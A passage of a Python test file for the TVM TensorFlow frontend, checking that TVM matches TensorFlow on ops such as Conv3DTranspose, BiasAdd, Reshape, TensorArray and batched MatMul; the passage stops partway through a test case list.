@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
    """Conv3DTranspose in NCDHW (GPU only) and NDHWC layouts."""
    if is_gpu_available():
        # NCDHW layout cases.
        _test_convolution3d_transpose(
            data_shape=[1, 10, 8, 8, 8],
            filter_shape=[1, 1, 1, 6, 10],
            strides=[1, 1, 1],
            padding="VALID",
            output_shape=[1, 6, 8, 8, 8],
        )
        _test_convolution3d_transpose(
            data_shape=[4, 9, 8, 8, 8],
            filter_shape=[1, 1, 1, 6, 9],
            strides=[1, 1, 1],
            padding="VALID",
            output_shape=[4, 6, 8, 8, 8],
        )
        _test_convolution3d_transpose(
            data_shape=[1, 3, 8, 8, 8],
            filter_shape=[1, 1, 1, 6, 3],
            strides=[2, 2, 2],
            padding="SAME",
            output_shape=[1, 6, 15, 15, 15],
        )
        _test_convolution3d_transpose(
            data_shape=[1, 16, 8, 8, 8],
            filter_shape=[3, 3, 3, 6, 16],
            strides=[3, 3, 3],
            padding="VALID",
            output_shape=[1, 6, 24, 24, 24],
        )
    # NDHWC layout cases run on any target.
    _test_convolution3d_transpose(
        data_shape=[1, 8, 8, 8, 10],
        filter_shape=[1, 1, 1, 6, 10],
        strides=[1, 1, 1],
        padding="VALID",
        output_shape=[1, 8, 8, 8, 6],
        data_format="NDHWC",
    )
    _test_convolution3d_transpose(
        data_shape=[4, 8, 8, 8, 9],
        filter_shape=[1, 1, 1, 6, 9],
        strides=[1, 1, 1],
        padding="VALID",
        output_shape=[4, 8, 8, 8, 6],
        data_format="NDHWC",
    )
    _test_convolution3d_transpose(
        data_shape=[1, 8, 8, 8, 3],
        filter_shape=[1, 1, 1, 6, 3],
        strides=[2, 2, 2],
        padding="SAME",
        output_shape=[1, 15, 15, 15, 6],
        data_format="NDHWC",
    )
    _test_convolution3d_transpose(
        data_shape=[1, 8, 8, 8, 16],
        filter_shape=[3, 3, 3, 6, 16],
        strides=[3, 3, 3],
        padding="VALID",
        output_shape=[1, 24, 24, 24, 6],
        data_format="NDHWC",
    )
    # Test without adding shapes to graph def
    _test_convolution3d_transpose(
        data_shape=[1, 8, 8, 8, 16],
        filter_shape=[3, 3, 3, 6, 16],
        strides=[3, 3, 3],
        padding="VALID",
        output_shape=[1, 24, 24, 24, 6],
        data_format="NDHWC",
        add_shapes_to_graph_def=False,
    )
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
    """One iteration of BiasAdd with given shapes and attributes.

    Builds a BiasAdd node in a fresh graph and compares TF against TVM.
    The bias length follows the channel dimension; the indexing assumes a
    4-D input shape (NCHW -> axis 1, otherwise axis 3).
    """
    # Consistency: use np.prod like the sibling _test_convolution helpers
    # instead of a manual accumulation loop.
    total_size_1 = np.prod(tensor_in_sizes)
    tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
    total_size_2 = tensor_bias_sizes[0]
    # Initializes the input tensor with array containing incrementing
    # numbers from 1.
    data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
    bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
        in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
        nn_ops.bias_add(in_data, in_bias, data_format=data_format)
        compare_tf_with_tvm(
            np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
        )
@tvm.testing.uses_gpu
def test_forward_biasadd():
    """BiasAdd in NCHW (GPU only) and NHWC layouts."""
    if is_gpu_available():
        _test_biasadd([4, 176, 8, 8], "NCHW")
        _test_biasadd([1, 100, 1, 1], "NCHW")
        _test_biasadd([4, 19, 17, 17], "NCHW")
        _test_biasadd([4, 124, 3, 3], "NCHW")
    _test_biasadd([4, 8, 8, 176], "NHWC")
    _test_biasadd([1, 1, 1, 100], "NHWC")
    _test_biasadd([4, 17, 17, 19], "NHWC")
    _test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
    """Run tf.where (argwhere form) on random data and check against TVM."""
    with tf.Graph().as_default():
        dtype = tf.float32
        sample = np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape)
        t = tf.constant(sample.astype(dtype.name))
        out = tf.where(t)
        # Exercise both the debug interpreter and the VM executor.
        for mode in ("debug", "vm"):
            compare_tf_with_tvm([], [], out.name, mode=mode)
def test_forward_argwhere():
    """Argwhere over tensors of rank 1 through 5 (side length 5 each)."""
    for rank in range(1, 6):
        _test_forward_where((5,) * rank)
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
    """Compare tf.space_to_batch_nd against TVM on random data."""
    sample = np.random.uniform(0, 5, size=input_shape).astype(dtype)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=input_shape, dtype=dtype)
        result = tf.space_to_batch_nd(placeholder, block_shape, paddings)
        compare_tf_with_tvm(sample, placeholder.name, result.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
    """SpaceToBatchND whose paddings are an op result, not a graph input."""
    sample = np.random.uniform(0, 5, size=input_shape).astype(dtype)
    pad_values = np.array([0, 1]).astype(np.int32).reshape((1, 2))
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=input_shape, dtype=dtype)
        pad_const = tf.constant(pad_values, dtype=tf.int32)
        # Feed the paddings through tf.reverse so they are produced by an op
        # rather than being a graph input, forcing the converter to recover
        # them via infer_value_simulated.
        inferred_pads = tf.reverse(pad_const, axis=[-1])
        result = tf.space_to_batch_nd(placeholder, block_shape, inferred_pads)
        compare_tf_with_tvm(sample, placeholder.name, result.name)
def test_forward_space_to_batch_nd():
    """SpaceToBatchND over 4-D, 2-D and 3-D inputs, plus inferred paddings."""
    # test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
    _test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
    _test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
    _test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
    _test_space_to_batch_nd(
        input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
    )
    # pylint: disable=line-too-long
    # https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
    _test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
    _test_space_to_batch_nd(
        input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
    )
    _test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
    """Compare tf.batch_to_space_nd against TVM on random data."""
    sample = np.random.uniform(0, 5, size=input_shape).astype(dtype)
    with tf.Graph().as_default():
        placeholder = tf.placeholder(shape=input_shape, dtype=dtype)
        result = tf.batch_to_space_nd(placeholder, block_shape, crops)
        compare_tf_with_tvm(sample, placeholder.name, result.name)
def test_forward_batch_to_space_nd():
    """BatchToSpaceND over a range of block shapes, crops and dtypes."""
    # test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
    _test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
    _test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
    _test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
    _test_batch_to_space_nd(
        input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
    )
    # pylint: disable=line-too-long
    # https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
    _test_batch_to_space_nd(
        input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
    )
    _test_batch_to_space_nd(
        input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
    )
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
    """One reshape of *data* to *out_shape*, checked against TVM."""
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        array_ops.reshape(placeholder, out_shape)
        compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
    """Reshape whose target shape converts to a relay.expr.Call (const * 2)."""
    data = np.zeros((6, 4, 2))
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        # The shape is the result of a multiply op, not a plain constant.
        shape_tensor = tf.multiply(tf.constant([1, 2, 3], dtype="int32"), 2)
        array_ops.reshape(placeholder, shape_tensor)
        compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
    """Reshape where the target shape is read from another tensor's shape."""
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        # NOTE(review): the template placeholder reuses data.dtype rather than
        # shape_like.dtype — presumably intentional since only its shape is used.
        template = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
        target_shape = array_ops.shape(template)
        array_ops.reshape(placeholder, target_shape)
        compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
    """Reshape whose target shape is computed symbolically as a + b."""
    with tf.Graph().as_default():
        in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        lhs = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
        rhs = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
        out = array_ops.reshape(in_data, tf.add(lhs, rhs))
        # Check both the debug interpreter and the VM executor.
        for mode in ["debug", "vm"]:
            compare_tf_with_tvm(
                [data, a_data, b_data], [in_data.name, lhs.name, rhs.name], out.name, mode=mode
            )
def test_forward_reshape():
    """Reshape: static shapes, op-computed shapes, shape-like and symbolic."""
    _test_reshape(np.arange(6.0), [2, 3])
    _test_reshape(np.arange(6), [-1, 2])
    _test_reshape(np.arange(6), [3, -1])
    _test_reshape(np.arange(6), [-1])
    _test_reshape_with_call()
    _test_reshape_like(np.zeros((3, 6)), np.zeros((9, 2)))
    # Symbolic shapes: zeros in one operand are filled by the other via add.
    _test_reshape_symbolic(np.arange(6.0), np.array([2, 0]), np.array([0, 3]))
    _test_reshape_symbolic(np.arange(6), np.array([-1, 0]), np.array([0, 2]))
    _test_reshape_symbolic(np.arange(6), np.array([3, 0]), np.array([3, -1]))
    _test_reshape_symbolic(np.arange(6), np.array([0]), np.array([-1]))
#######################################################################
# DepthToSpace
# ------------
def _test_depthtospace(data, block_size):
    """One depth_to_space op with the given data and block size."""
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        array_ops.depth_to_space(placeholder, block_size)
        compare_tf_with_tvm(data, "Placeholder:0", "DepthToSpace:0")
def test_forward_depthtospace():
    """DepthToSpace with block sizes 2 and 4 on random NHWC data."""
    _test_depthtospace(np.random.normal(size=[1, 32, 32, 4]), 2)
    _test_depthtospace(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# SpaceToDepth
# ------------
def _test_spacetodepth(data, block_size):
    """One space_to_depth op with the given data and block size."""
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        array_ops.space_to_depth(placeholder, block_size)
        compare_tf_with_tvm(data, "Placeholder:0", "SpaceToDepth:0")
def test_forward_spacetodepth():
    """SpaceToDepth with block sizes 2 and 4 on random NHWC data."""
    _test_spacetodepth(np.random.normal(size=[1, 32, 32, 4]), 2)
    _test_spacetodepth(np.random.normal(size=[1, 16, 8, 32]), 4)
#######################################################################
# Squeeze
# -------
def _test_squeeze(data, squeeze_dims=None):
    """One squeeze op, optionally restricted to *squeeze_dims*."""
    dims = [] if squeeze_dims is None else squeeze_dims
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        # An empty dims list means "squeeze all size-1 axes"; pass no argument.
        if dims:
            array_ops.squeeze(placeholder, dims)
        else:
            array_ops.squeeze(placeholder)
        compare_tf_with_tvm(data, "Placeholder:0", "Squeeze:0")
def test_forward_squeeze():
    """Squeeze: no-op, implicit, positive-index and negative-index dims."""
    # Nothing to squeeze.
    _test_squeeze(np.arange(2).reshape((2)))
    _test_squeeze(np.arange(6).reshape((2, 3)))
    # Squeeze the middle element away.
    _test_squeeze(np.arange(4).reshape((2, 1, 2)))
    # Squeeze on both ends.
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)))
    # Positive squeeze dim index.
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0])
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [2, 4])
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [0, 4, 2])
    # Negative squeeze dim index.
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-1])
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5])
    _test_squeeze(np.arange(6).reshape((1, 2, 1, 3, 1)), [-3, -5, -1])
#######################################################################
# TensorArray
# -----------
def test_tensor_array_write_read():
    """TensorArray write/read round-trip on the VM executor."""

    def run(dtype_str, infer_shape, element_shape):
        # Build a 2-slot TensorArray, write two constants, read slot 0 back.
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
            in_data = [np_data, np_data]
            t1 = tf.constant(np_data, dtype=dtype)
            t2 = tf.constant(np_data, dtype=dtype)
            ta1 = tf.TensorArray(
                dtype=dtype, size=2, infer_shape=infer_shape, element_shape=element_shape
            )
            ta2 = ta1.write(0, t1)
            ta3 = ta2.write(1, t2)
            out = ta3.read(0)
            g = tf.get_default_graph()  # unused; retained as-is
            # Output is referenced by its auto-generated graph node name.
            compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="vm")

    for dtype in ["float32", "int8"]:
        run(dtype, False, None)
        run(dtype, False, tf.TensorShape([None, 2]))
        run(dtype, True, None)
def test_tensor_array_scatter():
    """TensorArray scatter followed by reads of each scattered slot."""

    def run(dtype_str, infer_shape):
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            # With shape inference enabled, use an unknown-length element shape.
            if infer_shape:
                element_shape = tf.TensorShape([tf.Dimension(None)])
            else:
                element_shape = None
            t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str), dtype=dtype)
            indices = tf.constant([2, 1, 0])  # scatter rows in reverse order
            ta1 = tf.TensorArray(
                dtype=dtype, size=3, infer_shape=infer_shape, element_shape=element_shape
            )
            ta2 = ta1.scatter(indices, t)
            out0 = ta2.read(0)
            out1 = ta2.read(1)
            out2 = ta2.read(2)
            g = tf.get_default_graph()  # unused; retained as-is
            # Each read node gets a numbered auto-generated name.
            compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="vm")
            compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="vm")
            compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="vm")

    for dtype in ["float32", "int8"]:
        run(dtype, False)
        run(dtype, True)
def test_tensor_array_gather():
    """TensorArray scatter followed by a gather of a subset of slots."""

    def run(dtype_str, infer_shape):
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
            scatter_indices = tf.constant([2, 1, 0])
            gather_indices = tf.constant([1, 2])
            ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
            ta2 = ta1.scatter(scatter_indices, t)
            t1 = ta2.gather(gather_indices)
            g = tf.get_default_graph()  # unused; retained as-is
            compare_tf_with_tvm([], [], ["TensorArrayGatherV3:0"], mode="vm")

    for dtype in ["float32", "int8"]:
        run(dtype, True)
def test_tensor_array_split():
    """TensorArray split of an 8-row tensor into four 2-row slots."""

    def run(dtype_str, infer_shape):
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            t = tf.constant(
                np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
                    dtype_str
                ),
                dtype=dtype,
            )
            split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
            ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
            ta2 = ta1.split(t, split_length)
            out0 = ta2.read(0)
            out1 = ta2.read(1)
            out2 = ta2.read(2)
            out3 = ta2.read(3)
            g = tf.get_default_graph()  # unused; retained as-is
            # Each read node gets a numbered auto-generated name.
            compare_tf_with_tvm([], [], ["TensorArrayReadV3:0"], mode="debug")
            compare_tf_with_tvm([], [], ["TensorArrayReadV3_1:0"], mode="debug")
            compare_tf_with_tvm([], [], ["TensorArrayReadV3_2:0"], mode="debug")
            compare_tf_with_tvm([], [], ["TensorArrayReadV3_3:0"], mode="debug")

    for dtype in ["float32", "int8"]:
        run(dtype, False)
        run(dtype, True)
def test_tensor_array_concat():
    """TensorArray split followed by concat back into one tensor."""

    def run(dtype_str, infer_shape):
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            t = tf.constant(
                np.array([[1.0], [2.0], [3.0], [4.0], [5.0], [6.0], [7.0], [8.0]]).astype(
                    dtype_str
                ),
                dtype=dtype,
            )
            split_length = tf.constant([2, 2, 2, 2], dtype=tf.int32)
            ta1 = tf.TensorArray(dtype=dtype, size=4, infer_shape=infer_shape)
            ta2 = ta1.split(t, split_length)
            t = ta2.concat()
            # Identity gives the concat result a stable output node name.
            out = tf.identity(t)
            compare_tf_with_tvm([], [], ["Identity:0"], mode="debug")

    for dtype in ["float32", "int8"]:
        run(dtype, False)
        run(dtype, True)
def test_tensor_array_size():
    """TensorArray size query after two writes."""
    # Known-broken on newer TF; skipped rather than failing.
    if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
        pytest.skip("Needs fixing for tflite >= 1.15.0")

    def run(dtype_str, infer_shape):
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            np_data = np.array([[1.0, 2.0], [3.0, 4.0]]).astype(dtype_str)
            in_data = [np_data, np_data]
            t1 = tf.constant(np_data, dtype=dtype)
            t2 = tf.constant(np_data, dtype=dtype)
            ta1 = tf.TensorArray(dtype=dtype, size=2, infer_shape=infer_shape)
            ta2 = ta1.write(0, t1)
            ta3 = ta2.write(1, t2)
            out = ta3.size()
            g = tf.get_default_graph()  # unused; retained as-is
            compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")

    for dtype in ["float32", "int8"]:
        run(dtype, False)
        run(dtype, True)
def test_tensor_array_stack():
    """TensorArray scatter followed by stack, executed on the VM."""

    def run(dtype_str, infer_shape):
        # Known-broken on newer TF; skipped rather than failing.
        if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
            pytest.skip("Needs fixing for tflite >= 1.15.0")
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            t = tf.constant(np.array([[1.0], [2.0], [3.0]]).astype(dtype_str))
            scatter_indices = tf.constant([2, 1, 0])
            ta1 = tf.TensorArray(dtype=dtype, size=3, infer_shape=infer_shape)
            ta2 = ta1.scatter(scatter_indices, t)
            # Fix: removed a leftover debug print(t1) and the unused
            # g = tf.get_default_graph() local.
            t1 = ta2.stack()
            compare_tf_with_tvm([], [], ["TensorArrayStack/TensorArrayGatherV3:0"], mode="vm")

    for dtype in ["float32", "int8"]:
        run(dtype, True)
def test_tensor_array_unstack():
    """TensorArray unstack, then size query and a slot read."""

    def run(dtype_str, input_shape, infer_shape):
        # Known-broken on newer TF; skipped rather than failing.
        if package_version.parse(tf.VERSION) >= package_version.parse("1.15.0"):
            pytest.skip("Needs fixing for tflite >= 1.15.0")
        with tf.Graph().as_default():
            dtype = tf_dtypes[dtype_str]
            t = tf.constant(np.random.choice([0, 1, 2, 3], size=input_shape).astype(dtype.name))
            ta1 = tf.TensorArray(dtype=dtype, infer_shape=infer_shape, size=input_shape[0])
            ta2 = ta1.unstack(t)
            out0 = ta2.size()
            out1 = ta2.read(0)
            compare_tf_with_tvm([], [], "TensorArraySizeV3:0", mode="debug")
            compare_tf_with_tvm([], [], "TensorArrayReadV3:0", mode="debug")

    for dtype in ["float32", "int8"]:
        run(dtype, (5,), False)
        run(dtype, (5, 5), True)
        run(dtype, (5, 5, 5), False)
        run(dtype, (5, 5, 5, 5), True)
#######################################################################
# ConcatV2
# --------
def _test_concat_v2(shape1, shape2, dim):
    """One ConcatV2 of two float32 placeholders along axis *dim*."""
    with tf.Graph().as_default():
        dtype = "float32"
        lhs = tf.placeholder(shape=shape1, dtype=dtype, name="in1")
        rhs = tf.placeholder(shape=shape2, dtype=dtype, name="in2")
        array_ops.concat_v2([lhs, rhs], dim)
        feed1 = np.random.uniform(size=shape1).astype(dtype)
        feed2 = np.random.uniform(size=shape2).astype(dtype)
        compare_tf_with_tvm([feed1, feed2], ["in1:0", "in2:0"], "ConcatV2:0")
def test_forward_concat_v2():
    """ConcatV2 along leading, trailing and negative axes.

    Skipped on TF older than 1.4.1.
    """
    # Consistency fix: the rest of this file gates on
    # package_version.parse(tf.VERSION); the old LooseVersion-vs-string
    # comparison is deprecated (distutils) and less reliable.
    if package_version.parse(tf.VERSION) < package_version.parse("1.4.1"):
        return
    _test_concat_v2([2, 3], [2, 3], 0)
    _test_concat_v2([10, 3, 5], [2, 3, 5], 0)
    _test_concat_v2([2, 3], [2, 3], 1)
    _test_concat_v2([5, 8], [5, 4], 1)
    _test_concat_v2([2, 8, 5], [2, 8, 6], -1)
#######################################################################
# Sigmoid
# -------
def _test_sigmoid(data):
    """One sigmoid op on *data*, checked against TVM."""
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        math_ops.sigmoid(placeholder)
        compare_tf_with_tvm(data, "Placeholder:0", "Sigmoid:0")
def test_forward_sigmoid():
    """Sigmoid on a random 4-D float32 tensor."""
    _test_sigmoid(np.random.uniform(size=(3, 4, 4, 3)).astype("float32"))
#######################################################################
# Argmin/Argmax
# -------------
def _test_argx(func, data, **kwargs):
    """Run *func* (tf.argmax / tf.argmin) on *data* and compare with TVM."""
    with tf.Graph().as_default():
        placeholder = array_ops.placeholder(shape=data.shape, dtype=data.dtype, name="c0")
        func(placeholder, name="argx0", **kwargs)
        compare_tf_with_tvm(data, "c0:0", "argx0:0")
def test_forward_argminmax():
    """Argmax/argmin across all axes (incl. None) and both output dtypes."""
    for out_dtype in [tf.int64, tf.int32]:
        for axis in [None, 0, 1, 2]:
            sample = np.random.uniform(size=(8, 4, 9)).astype("float32")
            _test_argx(tf.argmax, data=sample, axis=axis, output_type=out_dtype)
            _test_argx(tf.argmin, data=sample, axis=axis, output_type=out_dtype)
#######################################################################
# Variable
# --------
def _test_variable(data):
    """One matmul against a TF variable, initialized before comparison."""
    tf.reset_default_graph()
    with tf.Graph().as_default():
        input_op = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
        input_tensor = array_ops.reshape(input_op, data.shape)
        size = input_tensor.shape.dims[1]
        # Square weight variable created inside a named scope.
        with variable_scope.variable_scope("linear", reuse=None):
            w = variable_scope.get_variable("w", shape=[size, size], dtype=input_tensor.dtype)
        math_ops.matmul(input_tensor, w)
        # init_global_variables makes the comparison initialize the variable.
        compare_tf_with_tvm(data, "Placeholder:0", "MatMul:0", init_global_variables=True)
def test_forward_variable():
    """Variable type op test"""
    _test_variable(np.random.uniform(size=(32, 100)).astype("float32"))
@tvm.testing.parametrize_targets("llvm", "cuda")
def test_read_variable_op(target, dev):
    """ReadVariableOp: unfrozen graphs must be rejected, frozen ones converted.

    First asserts that converting a graph with live (resource) variables
    raises the "Graph is not frozen" error, then freezes the variables to
    constants and checks TF vs TVM outputs.
    """
    tf.reset_default_graph()
    data = np.random.uniform(size=(32, 100)).astype("float32")
    input_tensor = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
    size = input_tensor.shape.dims[1]
    var_data = np.random.uniform(-5, 5, size=[size, size]).astype(np.float32)
    # use_resource=True makes this a resource variable (ReadVariableOp).
    input_var = tf.Variable(var_data, name="var1", use_resource=True)
    math_ops.matmul(input_tensor, input_var)
    out_name = ["MatMul:0"]
    out_node = ["MatMul"]
    in_name = ["Placeholder:0"]
    in_node = ["Placeholder"]
    in_data = [data]
    with tf.Session() as sess:
        sess.run(variables.global_variables_initializer())
        final_graph_def = sess.graph.as_graph_def(add_shapes=True)
        tf_output = run_tf_graph(sess, in_data, in_name, out_name)
        shape_dict = {e: i.shape for e, i in zip(in_name, in_data)}
        # Conversion of the unfrozen graph must fail with a clear message.
        with pytest.raises(Exception) as execinfo:
            mod, params = relay.frontend.from_tensorflow(
                final_graph_def, layout=None, shape=shape_dict, outputs=None
            )
        assert execinfo.value.args[0].startswith("Graph is not frozen. Provide a frozen graph")
        # Now convert the variables to constant and run inference on the converted graph
        final_graph_def = tf.graph_util.convert_variables_to_constants(
            sess,
            sess.graph.as_graph_def(add_shapes=True),
            out_node,
        )
        tvm_output = run_tvm_graph(
            final_graph_def,
            in_data,
            in_node,
            target=target,
            out_names=out_name,
            num_output=len(out_name),
        )
        for i in range(len(tf_output)):
            tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-4, rtol=1e-5)
        sess.close()
#######################################################################
# MatMul, BatchMatMul, BatchMatMulV2
# ----------------------------------
def _test_matmul(i, j, k, dtype, outer=None):
    """One MatMul iteration: (i, j) x (j, k) over every transpose combination."""
    base_a = [i, j]
    base_b = [j, k]
    batch = outer or []
    for transpose_a in (False, True):
        for transpose_b in (False, True):
            # Reverse the base shape when the operand is fed transposed.
            shape_a = batch + (base_a[::-1] if transpose_a else base_a)
            shape_b = batch + (base_b[::-1] if transpose_b else base_b)
            with tf.Graph().as_default():
                A = tf.placeholder(shape=shape_a, dtype=dtype, name="A")
                B = tf.placeholder(shape=shape_b, dtype=dtype, name="B")
                result = tf.matmul(A, B, transpose_a=transpose_a, transpose_b=transpose_b)
                a_np = np.random.uniform(high=5.0, size=shape_a).astype(dtype)
                b_np = np.random.uniform(high=5.0, size=shape_b).astype(dtype)
                compare_tf_with_tvm([a_np, b_np], [A.name, B.name], result.name)
def test_forward_matmul():
    """MatMul op test with int32 and float64 operands."""
    for dims, dtype in (((1, 3, 6), "int32"), ((5, 3, 1), "float64")):
        _test_matmul(*dims, dtype)
def _test_batch_matmul(A_shape, B_shape, dtype, adjoint_a=False, adjoint_b=False):
    """One BatchMatMul iteration with optional adjoints on either operand."""
    with tf.Graph().as_default():
        lhs = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
        rhs = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        product = tf.matmul(lhs, rhs, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
        lhs_np = np.random.uniform(high=5.0, size=A_shape).astype(dtype)
        rhs_np = np.random.uniform(high=5.0, size=B_shape).astype(dtype)
        compare_tf_with_tvm([lhs_np, rhs_np], [lhs.name, rhs.name], product.name)
def _test_batch_matmul_dynamic(
    A_shape, B_shape, A_np_shape, B_np_shape, dtype, adjoint_a=False, adjoint_b=False
):
    """BatchMatMul with symbolic (None) dims; concrete shapes fed at run time."""
    with tf.Graph().as_default():
        lhs = tf.placeholder(shape=A_shape, dtype=dtype, name="A")
        rhs = tf.placeholder(shape=B_shape, dtype=dtype, name="B")
        product = tf.matmul(lhs, rhs, adjoint_a=adjoint_a, adjoint_b=adjoint_b, name="batchmatmul")
        lhs_np = np.random.uniform(high=5.0, size=A_np_shape).astype(dtype)
        rhs_np = np.random.uniform(high=5.0, size=B_np_shape).astype(dtype)
        # for now, in TOPI, only cublas's implementation support dynamic shape
        # TODO add more backends support in TOPI
        compare_tf_with_tvm(
            [lhs_np, rhs_np], [lhs.name, rhs.name], product.name, mode="vm", targets=["cuda -libs=cublas"]
        )
def test_forward_batch_matmul():
    """TF op BatchMatMul, BatchMatMulV2 test over ranks 3 through 8."""
    cases = [
        ((3, 5, 4), (3, 4, 5), "int32", False, False),
        ((3, 5, 4), (3, 4, 5), "float32", True, True),
        ((3, 5, 4), (3, 5, 4), "int32", True, False),
        ((3, 5, 4), (3, 5, 4), "float32", False, True),
        ((2, 3, 4, 5, 6), (2, 3, 4, 6, 5), "int32", False, False),
        ((1, 2, 3, 4, 5, 6), (1, 2, 3, 4, 6, 5), "float32", True, True),
        ((3, 4, 5, 6), (3, 4, 5, 6), "int32", True, False),
        ((2, 3, 4, 2, 3, 4, 5, 6), (2, 3, 4, 2, 3, 4, 5, 6), "float32", False, True),
    ]
    for a_shape, b_shape, dtype, adj_a, adj_b in cases:
        _test_batch_matmul(a_shape, b_shape, dtype, adj_a, adj_b)
@tvm.testing.requires_cuda
def test_forward_batch_matmul_dynamic():
    """BatchMatMul with dynamic batch dimensions (cublas-backed, CUDA only)."""
    cases = [
        ((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "int32", False, False),
        ((None, 5, 4), (None, 4, 5), (3, 5, 4), (3, 4, 5), "float32", True, True),
